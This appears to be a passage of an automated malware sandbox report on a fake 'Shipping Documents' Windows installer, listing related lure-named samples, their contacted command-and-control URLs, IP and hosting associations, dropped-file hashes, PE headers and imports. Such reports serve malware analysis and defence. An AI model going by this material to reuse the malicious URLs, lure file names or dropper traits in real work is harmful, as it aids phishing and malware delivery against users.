    • www.thebluefishhotel.net/qjnt/?r6q=QMUGPevj6PrnoskDHEVzH6HtR6H2zoEQzp8FCPJ3iWAiEQEpPvh9CDWyW7XbbWKJxYUk&rTFDm=GBOxAlxXYbRxGd
  SO.xlsm.exe | malicious
    • www.innergardenhealing.space/vns/?LhyT=zVctTXmfihjFUsAOMVrNY/RZD+cbtBdO/414jUVl4R7yRJAmeLRzuR8nHqD+F0uaORIo&E8OxL=vBZhT2dHLjy0LJ
  RDAx9iDSEL.exe | malicious
    • www.totally-seo.com/p2io/?KtxL=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MoCWZBvIMUw&NtTdXn=wXL40t9Hkrxhn
  MrV6Do8tZr.exe | malicious
    • www.totally-seo.com/p2io/?IR-4RXN=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7PESKodUP59hGuNmhA==&Bl=lHL8SnehYVc
  jH10jDMcBZ.exe | malicious
    • www.pimpmyrecipe.com/goei/?hBZpUr88=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9yrGt+CfvTHOy+nA==&ofuxZl=yVJLPZsh
  Bank Details.exe | malicious
    • www.bkadvisor.solutions/oop8/?VxltT=6leXzhz0HpbTyjo0&uTCxy=9q1jRSOnnNf60k4S5uNju76o5PZZ5N10RY2/dWv7PNz7/EQQEm71kaM265hkKCffnmaelGAAXw==
  slystan.xlsm.exe | malicious
    • www.innergardenhealing.space/vns/?LHQD=zVctTXmfihjFUsAOMVrNY/RZD+cbtBdO/414jUVl4R7yRJAmeLRzuR8nHpjuKV+iQ0hv&T6oxFd=cV5TBxmhbt1LOZ
  Order PO #5544 TULIP GROUP LLC , PDF.exe | malicious
    • www.leonspropertysolutions.com/ewws/?OBttf=Rig5aSaUxJV4q+XrAdOvMvt+HSYND7QLvg+Ya6a+ZEgoSp/4o5PSorZAhMzJpSu+xT2Y&uTxX=ApmHH4
  qmhFLhRoEc.exe | malicious
    • www.anewdistraction.com/p2io/?YrCXdBfh=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwqY+f6mMsY&EzuxZr=3fX4
  uNttFPI36y.exe | malicious
    • www.anewdistraction.com/p2io/?CR=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAcDb+jCvvZO4wivfA==&QL0=ehux_83x40_XBX2
  RE New order.exe | malicious
    • www.artagayne.com/bfak/?hnKTL2G=IEpF3fMuhFaVGoxUipaAbx4zzMr2AIwY1zqXBesPXpO0ClU4ldjrZa1VKGtyyF0e6Bf2&jL0Hir=Uxl4Q6Zhkt
  Shipping documents doc.exe | malicious
    • www.mobcitylabs.com/gnk/?uTdLB8=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGvGaG9cV/7Lr&adWdvD=OfpxebaP
  Swift Copy#0002.exe | malicious
    • www.ryannandrenee.com/ve9m/?-Z2D=RGPxIYcYYZMRssQx83blssQCW28eAYFOMhAVyeJzr7PHP1CJckGguhov8OVhYhGBnZIz&4h5=k2JX5xRHxZU0PLap
  Packing List.exe | malicious
    • www.sanctumwell.com/chue/?k0GdoVb=LXiihE4+8betnnXE6wCUtZgfXL5im0GvFl2FnJa1SS/lY513m5Is9Ep+TyRGHAkUzeYb&NZeTzz=AbmdQfuHJ8KlVRip
  INV#609-005.PDF.exe | malicious
    • www.ryannandrenee.com/ve9m/?vPDhx=RGPxIYcYYZMRssQx83blssQCW28eAYFOMhAVyeJzr7PHP1CJckGguhov8N1xXAW558h0&kfL8ap=F6AlIfF8e4F
  PaymentBNK#2.PDF.exe | malicious
    • www.jeannegauliard.com/ve9m/?Jtx=rn2/WBoBBrSTDsPQBl5n5Tr1lIbuBbDEq2cf+qNtMvqv6yqW+TuUHUpYwKZu5L02o3jn&_jqp3V=gH2dK0JxIR5
  Payment Invoice.exe | malicious
    • www.minterfortexas.com/chue/?Bxl4iL=G9TtVN5R6EJkOjOehstyspBsMB8h6uPP4SNtk4flZ+Q+zaxTbo8GQGYSWt4KCoCWgLKd&xPZTBf=dn-paHGxXlDP
23.227.38.74
  Remittance Advice pdf.exe | malicious
    • www.sewadorbsclothing.com/nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI
  74ed218c_by_Libranalysis.exe | malicious
    • www.babyshopit.com/8u3b/?EzrxUr=TE3r3Po/80I3A7BjdmOrtV2X1cXMdBXcsPlehNMo8xFrjXCGEx4PM+IgH3zoRtc5Tgzkp+uvDw==&0VMt8D=3fJTbJlpxpVT_2d0
  don.exe | malicious
    • www.funnyfootballmugs.com/uoe8/?BR=cjlpd&Y4plXns=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8
  WaybillDoc_7349796565.pdf.exe | malicious
    • www.theestellawear.com/sbqi/?JtxL=Ofv0h5DUcgF1HBnP9jQv4WLSG1M3kjn+2XlmTbHkz/cbhvSYry19ohgdWpI3v2dkGCKs&pph=kJBTslxPNNKLxNz
  a3aa510e_by_Libranalysis.exe | malicious
    • www.exuberantemodafeminina.com/ued5/?t8o8ntU=P+YSthdRkosM1Kkk+FGYkcUIeENu2yCNDkfR3XxxXKvwa5X+dXL5WZZdMs5u6SZ4VnDl&kRm0q=J48P
  wMqdemYyHm.exe | malicious
    • www.raiseamerican.com/f0sg/?7n0lqHm=YNkyISHPJk/bibwJBhOHtZm0DRLrV9PaArDWVr56RQ+cEQwRll7Xlbem2zoOENnktRSV&CP=chrxU
  PO#10244.exe | malicious
    • www.dreamlikeliving.com/uv34/?xV8HslL8=5UaGcRQVNBURRiJV+9v1SQNlNBIBrH6pS93qQ4ZjH/IbytUWJvzWBvUcaoCYSFJ+DAMYTluhcw==&1bz=o8rHa
  493bfe21_by_Libranalysis.exe | malicious
    • www.advionpowergel.com/8njn/?CTvX=cvRh_lYP&uFNl=SvxnXnxPZ6/RXiCEA5gpWOUe8/6ZD7+WedveK6ILzn6yPy4OJmK7t7jGBRqeY+TLnjv1
  DocNo2300058329.exe | malicious
    • www.exuberantemodafeminina.com/ued5/?RL0=P+YSthdRkosM1Kkk+FGYkcUIeENu2yCNDkfR3XxxXKvwa5X+dXL5WZZdMvZ+1zJALCqi&BR-d4N=7nMpkDO0IdLxFH6P
  x16jmZMFrN.exe | malicious
    • www.covidpreventionshop.com/h6fe/?idCt3l3x=lvVfZQo4A24dNSGxxPwiOsdgHIv5tWk/cS3b4qunPdJKlwuQQcnTCZP3mbjBL0nYndss&Rv=Y2MpoVAxKRFDj0y
  TNT SHIPPING DOC 6753478364.exe | malicious
    • www.heoslight.com/maw9/?0V0hlZ=WKgLlhFhEzeNjFMge4LpHm5g+ODrZerh8srqhGFWn5kwTJLJyZ0r84PSd6yLMthvhFEa&OVolp8=AZ9lQ6QHS8EdPrG0
  z5Wqivscwd.exe | malicious
    • www.raiseamerican.com/f0sg/?9rQPJl=YNkyISHPJk/bibwJBhOHtZm0DRLrV9PaArDWVr56RQ+cEQwRll7Xlbem2zokb9XkpTaV&EzrtFB=4hL05l3xNH1L
  DVO100024000.doc | malicious
    • www.americanstatesapparel.com/f0sg/?tDK=3tuwmvhMi7pGvx+mmUPwBEVcP0da4WtROkbfwo1L944cWBUw2PlAV4md2HmgZSuKmmCfDA==&LPYP_=Sfgd
  100005111.exe | malicious
    • www.dreamlikeliving.com/uv34/?tXEd=9r4tEpsH-L5HP&2dspJx=5UaGcRQVNBURRiJV+9v1SQNlNBIBrH6pS93qQ4ZjH/IbytUWJvzWBvUcaruiRElFA3tJ
  1103305789.exe | malicious
    • www.dreamlikeliving.com/uv34/?rZ=5UaGcRQVNBURRiJV+9v1SQNlNBIBrH6pS93qQ4ZjH/IbytUWJvzWBvUcaoChN0p9NWQfTlumPA==&sBvD8F=GxopsDgxOz1D0R
  ofertă comandă de cumpărare_pdf.exe | malicious
    • www.weirdkult.com/b3gc/?ndkHzH=-Z20XnRx36xD&ARn=fdxwzo3oR3+60ycRzpiGgZCohcHl+5WU1+HTjmZXhP2AlGDanZS5zFmFBLd5xguXKjuO
  zDUYXIqwi4.exe | malicious
    • www.recovatek.com/hx3a/?YVMtavf=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYuCZjxFqiyLV4XQ2A==&EBZ=ZTIHdV4XjtnXb
  HbnmVuxDIc.exe | malicious
    • www.manicolada.com/oerg/?xBZ4k4xH=VrJFN02EWUtV1rIt9g/j1QSdUuEw0Uf1/z3ywhG+Y3UeSqedxSn0wL7pECCF3FrbmHhMvfLpdA==&tHr8=gdfDsdw8
  Invoice.exe | malicious
    • www.cjaccessories.net/eqas/?v4Xp-=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&0nGP-6=LhrLJ4-pzBedz
  OuuJQ2R6v5.exe | malicious
    • www.trumpchix.com/g8bi/?7n=zq4LXs77W3q9n4caIdqAltHL4o48M8oiqlf9nZ5gHtwqOaWe9U5+XgrVJla/dPCaIiP2&lHK8=X2JX02PxcH_p0rM

                                        Domains

Match | Associated Sample Name / URL | Detection | Context
shops.myshopify.com
  Remittance Advice pdf.exe | malicious
    • 23.227.38.74
  74ed218c_by_Libranalysis.exe | malicious
    • 23.227.38.74
  don.exe | malicious
    • 23.227.38.74
  WaybillDoc_7349796565.pdf.exe | malicious
    • 23.227.38.74
  a3aa510e_by_Libranalysis.exe | malicious
    • 23.227.38.74
  wMqdemYyHm.exe | malicious
    • 23.227.38.74
  PO#10244.exe | malicious
    • 23.227.38.74
  493bfe21_by_Libranalysis.exe | malicious
    • 23.227.38.74
  DocNo2300058329.exe | malicious
    • 23.227.38.74
  x16jmZMFrN.exe | malicious
    • 23.227.38.74
  TNT SHIPPING DOC 6753478364.exe | malicious
    • 23.227.38.74
  z5Wqivscwd.exe | malicious
    • 23.227.38.74
  DVO100024000.doc | malicious
    • 23.227.38.74
  100005111.exe | malicious
    • 23.227.38.74
  1103305789.exe | malicious
    • 23.227.38.74
  New order.04272021.DOC.exe | malicious
    • 23.227.38.74
  ofertă comandă de cumpărare_pdf.exe | malicious
    • 23.227.38.74
  zDUYXIqwi4.exe | malicious
    • 23.227.38.74
  HbnmVuxDIc.exe | malicious
    • 23.227.38.74
  Invoice.exe | malicious
    • 23.227.38.74
ext-sq.squarespace.com
  wMqdemYyHm.exe | malicious
    • 198.49.23.145
  d801e424_by_Libranalysis.docx | malicious
    • 198.185.159.144
  7824,pdf.exe | malicious
    • 198.49.23.145
  PO_29_00412.exe | malicious
    • 198.185.159.144
  DHL_S390201.exe | malicious
    • 198.185.159.145
  triage_dropped_file.exe | malicious
    • 198.185.159.144
  Wire transfer.exe | malicious
    • 198.185.159.144
  mC9LnX9aGE.exe | malicious
    • 198.49.23.145
  4x1cYP0PFs.exe | malicious
    • 198.49.23.145
  SO.xlsm.exe | malicious
    • 198.185.159.144
  RDAx9iDSEL.exe | malicious
    • 198.185.159.144
  MrV6Do8tZr.exe | malicious
    • 198.185.159.144
  50% payment.exe | malicious
    • 198.185.159.145
  Bank Details.exe | malicious
    • 198.185.159.144
  slystan.xlsm.exe | malicious
    • 198.185.159.144
  Order PO #5544 TULIP GROUP LLC , PDF.exe | malicious
    • 198.185.159.144
  oFTHxkeltz.rtf | malicious
    • 198.185.159.145
  qmhFLhRoEc.exe | malicious
    • 198.185.159.144
  uNttFPI36y.exe | malicious
    • 198.185.159.144
  RE New order.exe | malicious
    • 198.185.159.144

                                        ASN

Match | Associated Sample Name / URL | Detection | Context
SQUARESPACEUS
  S4qfwZnR6X.exe | malicious
    • 198.185.159.144
  wMqdemYyHm.exe | malicious
    • 198.49.23.145
  d801e424_by_Libranalysis.docx | malicious
    • 198.185.159.144
  7824,pdf.exe | malicious
    • 198.49.23.145
  PO_29_00412.exe | malicious
    • 198.185.159.144
  DHL_S390201.exe | malicious
    • 198.185.159.145
  triage_dropped_file.exe | malicious
    • 198.185.159.144
  4x1cYP0PFs.exe | malicious
    • 198.49.23.145
  SO.xlsm.exe | malicious
    • 198.185.159.144
  RDAx9iDSEL.exe | malicious
    • 198.185.159.144
  MrV6Do8tZr.exe | malicious
    • 198.185.159.144
  50% payment.exe | malicious
    • 198.185.159.145
  jH10jDMcBZ.exe | malicious
    • 198.185.159.144
  Bank Details.exe | malicious
    • 198.185.159.144
  slystan.xlsm.exe | malicious
    • 198.185.159.144
  Order PO #5544 TULIP GROUP LLC , PDF.exe | malicious
    • 198.185.159.144
  oFTHxkeltz.rtf | malicious
    • 198.185.159.145
  qmhFLhRoEc.exe | malicious
    • 198.185.159.144
  uNttFPI36y.exe | malicious
    • 198.185.159.144
  RE New order.exe | malicious
    • 198.185.159.144
CLOUDFLARENETUS
  Documents_111651917_375818984.xls | malicious
    • 104.21.64.132
  Documents_111651917_375818984.xls | malicious
    • 172.67.151.10
  813oo3jeWE.exe | malicious
    • 104.23.98.190
  4GGwmv0AJm.exe | malicious
    • 23.227.38.32
  c647b2da_by_Libranalysis.exe | malicious
    • 104.26.13.9
  FzDN7GfLRo.exe | malicious
    • 162.159.137.232
  Remittance Advice pdf.exe | malicious
    • 23.227.38.74
  Yeni sipariş _WJO-001, pdf.exe | malicious
    • 104.21.19.200
  Documents_95326461_1831689059.xls | malicious
    • 172.67.151.10
  Documents_95326461_1831689059.xls | malicious
    • 104.21.64.132
  5c542bb5_by_Libranalysis.exe | malicious
    • 104.21.84.93
  6a9b0000.da.dll | malicious
    • 104.20.184.68
  6ba90000.da.dll | malicious
    • 104.20.184.68
  5c542bb5_by_Libranalysis.exe | malicious
    • 104.21.84.93
  s.dll | malicious
    • 104.20.185.68
  setup-lightshot.exe | malicious
    • 104.23.139.12
  s.dll | malicious
    • 104.20.185.68
  74ed218c_by_Libranalysis.exe | malicious
    • 23.227.38.74
  Bank payment return x.exe | malicious
    • 104.21.19.200
  471e3984_by_Libranalysis.docx | malicious
    • 104.22.1.232

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

C:\Users\user\AppData\Local\Temp\6jozwj8vold4hca
Process: C:\Users\user\Desktop\202139769574 Shipping Documents.exe
File Type: data
Category: dropped
Size (bytes): 6661
Entropy (8bit): 7.965733975411533
Encrypted: false
SSDEEP: 192:G8dUYWCcT4LQA0xDqK8Y0XEmDaqw0TgnB:G0Z8A0xD1eECZw08B
MD5: FA3FABB95EFE2421CB6CFE45AF090058
SHA1: B640202E71BFA1A4491CB51CCA08C2CAEB261243
SHA-256: 5270B05F0892FA817E271BF75BDEC87F4E422BE60A5CC010C0779CAB5F9310AB
SHA-512: E8883E6AF046CC3A3A764705B379350201C6E630529833355239B54125CDA78645FA2F32559D19D0EB384035A5A8107EA6EC1D7E23967CC7485A8E5AA2021D3B
Malicious: false
Reputation: low
                                        Preview: ....d;...$..7s5..w.M:.......]@....f..RtD.3.k..$C....../.0...~..N.9.\.B.G.a.x...).^_L.$..<.Qt#....'.$.....6.........M......`t...uow..].%....f..zl...oui..k.K.H6....,.T.U..[t.A\.o...e3..k~....H.b.T.....9!.../.......(...ZJ0.V.d..S..WaE.S.=..V.@<DP...-.-..5.?..7#M..Xq.3.'?...\.{..*........9.f.......2.o..-."R.;.$.8..IW.v...C.`dF.q...:.OU....1..n$o...4......!..O...........kiu..Wx..$..gQ... ..8K!.k..N8..iE..R..U..U...(T.p...lm.....z .M#.Fc.....>.g2....]pw.V.Of.oJ...i...o...^...!...JL...B....%i.y.a..5e.d)..lI..m.H.>..13K.D.q.E-p.+.m.......1x.2...0.pN>.8...P...8..v.&.)..E.K:\...'.N...."..}...p4.$~...L...bJ.M...T.V..zH.?. .%X..#.v. ...~...k=K.Hr2.R.O.Q.....*.gg~.}..'2.=3z ...~..#.=C..f.x.Z.....a.T}c...o.E.!._.U,"<..'....!.*........._...."2b.e,r..v....`..=..,>?.6jT......*....E..e...e..*[.0"- |.?........xM.vXZ.).@...:......LO...G.2....`..9.P.D..M.L.,c.*....u.t..}E..SO.. ....|`....N.p*1...iSk.5...,O...?..p..K..g1.H.x.#.|..~;W..W..\qa.."{.v.}.|.X/.I.i.
C:\Users\user\AppData\Local\Temp\mjxrwbd3mn4
Process: C:\Users\user\Desktop\202139769574 Shipping Documents.exe
File Type: data
Category: dropped
Size (bytes): 186368
Entropy (8bit): 7.9991063815094785
Encrypted: true
SSDEEP: 3072:IyrTURCvk/yUkIzR58kBNxMoMxq+Yf3sgKqApifG2ke47if0/pmXIRvy:Nr6CM/yUkQX8SMoPf83Z0fG4qif0/pby
MD5: 563AC074A4ED1386DB6F9D39D07E27D8
SHA1: 86B4D17F259CE0AB4DDFAE1CC8AE71516BB6B02D
SHA-256: 2ACA38659931F371C14ACF2155E27B0F02C6D8DA853E9F3CA591B0E54A5D257B
SHA-512: 3CB98D18C7AA58152D74A895256356AB603931C1BECDD52653603D4EDC1F458EE5901C25524194FD6693090889E4BFDE6D66EC535AB1B1D4BFD4B9E9E98BCC02
Malicious: false
Reputation: low
                                        Preview: A.[.3..*.Q....{..sN...'<..ONeo..bLU...m ...7pl..6.BW.}.HX.K.0...._V...A..8..?.r....!....v..V.'.nY.z.T?..8..l.>o..aF.....4...h.i2.m3.j....<^..6.u...i.....:.....P.=..<*..K;S.....9.G.;3.9.d......F...#bW.O..;i.D.....Yq.}...G.D8...$NV.....RO.c....'...(.7.M.9|.......S.l<.d.w.$B...$a2..D0J$._O?....2O!.}.......U...4...9..2(.{Y1.=..v.#iK..V..O....,..K..k..../..)i.....1..y.."...t`sj......>.Q.%f3~.U.W...$..KsUT.....B.Q............V.....[.o]...l.Z...&....=.b(1.....XE.D....^...?rP..(.....jJ+. G%P/{.6..F.....T.;um%..zX~..........ZQ)..3W... ..;.....W.m.FZ.P.r.Wc.$..J....J..)u..N*..e..^.~od^.\h.;....N+.<2.<'..E.Y.....1....T..>k.:{..#.S{.$b_.....}..^zD.l.\9.O..x.rr..\8.s?3.-.-....ge.=......$....1......"#.9.Y..).L.U.N..]..C....{..N.....[...'!...B.bp.k...q.P. .0h...Q.d....%....Z.R?D.....Z(,...~.I.`......J...".....f+.bZ>,.-.........^.\...r&.....L.|N..%....4&V:..U.].eK..D-.vq.N%x')>(@..Y.......A.....X/.. .Y/.Y..*E...T.x.`.....j..pt.T....6..".1V...g..q.=.Y.
C:\Users\user\AppData\Local\Temp\nseCE57.tmp
Process: C:\Users\user\Desktop\202139769574 Shipping Documents.exe
File Type: data
Category: dropped
Size (bytes): 202809
Entropy (8bit): 7.951227965199436
Encrypted: false
SSDEEP: 6144:ErIr6CM/yUkQX8SMoPf83Z0fG4qif0/pb:OIrs/yU/8SLn83afJdfepb
MD5: EEC68D9A616CC886AE38B3F03FD9BF89
SHA1: 7CC6FEA48F92829BC72B6CB9C235D1342EBDC92C
SHA-256: 2269443BC541DD17909DA43985E6C73D332A4B89B8771F3A09276E16F0A449B5
SHA-512: E4E79ACDBC1501412F894851E686C31D23B703164102D34938709F78D7590DC5A6063381F86714B695CBE4DF3CF43A4765ED6BCEEB6D36F233A8BA58207891AF
Malicious: false
Reputation: low
                                        C:\Users\user\AppData\Local\Temp\nszCE87.tmp\22m80anrrsp.dll
                                        Process:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.592177790604414
                                        Encrypted:false
                                        SSDEEP:96:rcgn1ASkfNDZ+t8oFmfRYB0tGL+l6gUVklwLz2ub29+3EQs:wnmlLa6gWCki99+3EQ
                                        MD5:A91A7F4F897A9E713B5773E389980197
                                        SHA1:7B8BF8B09702848EF1E3FB0CFD8FA94FBF92FFC3
                                        SHA-256:E74DA3284780511C44E53FC952A7DFE12578DDCB37C3BCFF43C1C45D5A427B0A
                                        SHA-512:883A8957A712B3A83C90555B19CB71BD49EAD9B8B042FF18515007B3A081208F7E1AF38D56BDC0610D5A7F8D7758FF1DC3A8264E20DCF2E294CF852BB604B9DF
                                        Malicious:false
                                        Reputation:low
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................C1...........;.....;.....;.....Rich...........PE..L...T..`...........!......................... ...............................@.......................................!..P...$#......................................0!..............................P!..@............ ...............................text...p........................... ..`.rdata....... ......................@..@.data...L....0......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.8990267345678715
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:202139769574 Shipping Documents.exe
                                        File size:235115
                                        MD5:eee5f618718bc8237bb9c7a48154cf1a
                                        SHA1:84dc873f65dc9e86978944d1adddb762efcf2631
                                        SHA256:cc7b066e0fa912d406c27790458ad6feb171b27275b6e3fe46b7a7574da7bfce
                                        SHA512:8f49fab9642c63814bc77ff302d05719d92404fe38bd220060a161c51b3f6f129bd5c4b2a4b3a2e1e239488e31f157f32b772505f8501003682cc9904d205c57
                                        SSDEEP:6144:lPXIfOtwEmM2jSvr02vaoMrgkoHYltLEZZLMZU7J:aW2Ar0Esrbo4H0MZ+
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@

                                        File Icon

                                        Icon Hash:b2a88c96b2ca6a72

                                        Static PE Info

                                        General

                                        Entrypoint:0x403461
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                        Entrypoint Preview

                                        Instruction
                                        sub esp, 00000184h
                                        push ebx
                                        push esi
                                        push edi
                                        xor ebx, ebx
                                        push 00008001h
                                        mov dword ptr [esp+18h], ebx
                                        mov dword ptr [esp+10h], 0040A130h
                                        mov dword ptr [esp+20h], ebx
                                        mov byte ptr [esp+14h], 00000020h
                                        call dword ptr [004080B0h]
                                        call dword ptr [004080C0h]
                                        and eax, BFFFFFFFh
                                        cmp ax, 00000006h
                                        mov dword ptr [0042474Ch], eax
                                        je 00007F291CB83933h
                                        push ebx
                                        call 00007F291CB86AAEh
                                        cmp eax, ebx
                                        je 00007F291CB83929h
                                        push 00000C00h
                                        call eax
                                        mov esi, 004082A0h
                                        push esi
                                        call 00007F291CB86A2Ah
                                        push esi
                                        call dword ptr [004080B8h]
                                        lea esi, dword ptr [esi+eax+01h]
                                        cmp byte ptr [esi], bl
                                        jne 00007F291CB8390Dh
                                        push 0000000Bh
                                        call 00007F291CB86A82h
                                        push 00000009h
                                        call 00007F291CB86A7Bh
                                        push 00000007h
                                        mov dword ptr [00424744h], eax
                                        call 00007F291CB86A6Fh
                                        cmp eax, ebx
                                        je 00007F291CB83931h
                                        push 0000001Eh
                                        call eax
                                        test eax, eax
                                        je 00007F291CB83929h
                                        or byte ptr [0042474Fh], 00000040h
                                        push ebp
                                        call dword ptr [00408038h]
                                        push ebx
                                        call dword ptr [00408288h]
                                        mov dword ptr [00424818h], eax
                                        push ebx
                                        lea eax, dword ptr [esp+38h]
                                        push 00000160h
                                        push eax
                                        push ebx
                                        push 0041FD10h
                                        call dword ptr [0040816Ch]
                                        push 0040A1ECh

                                        Rich Headers

                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8438 | 0xa0 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0xbc8 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x1000 | 0x623c | 0x6400 | False | 0.65859375 | data | 6.40257705324 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata | 0x8000 | 0x1274 | 0x1400 | False | 0.43359375 | data | 5.05749598324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data | 0xa000 | 0x1a858 | 0x600 | False | 0.445963541667 | data | 4.08975001509 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .rsrc | 0x2d000 | 0xbc8 | 0xc00 | False | 0.435546875 | data | 4.46172201417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name | RVA | Size | Type | Language | Country
                                        RT_ICON | 0x2d1c0 | 0x2e8 | data | English | United States
                                        RT_DIALOG | 0x2d4a8 | 0x144 | data | English | United States
                                        RT_DIALOG | 0x2d5f0 | 0x100 | data | English | United States
                                        RT_DIALOG | 0x2d6f0 | 0x11c | data | English | United States
                                        RT_DIALOG | 0x2d810 | 0x60 | data | English | United States
                                        RT_GROUP_ICON | 0x2d870 | 0x14 | data | English | United States
                                        RT_MANIFEST | 0x2d888 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                        Imports

                                        DLL | Import
                                        ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                        SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                        ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                        COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                        USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
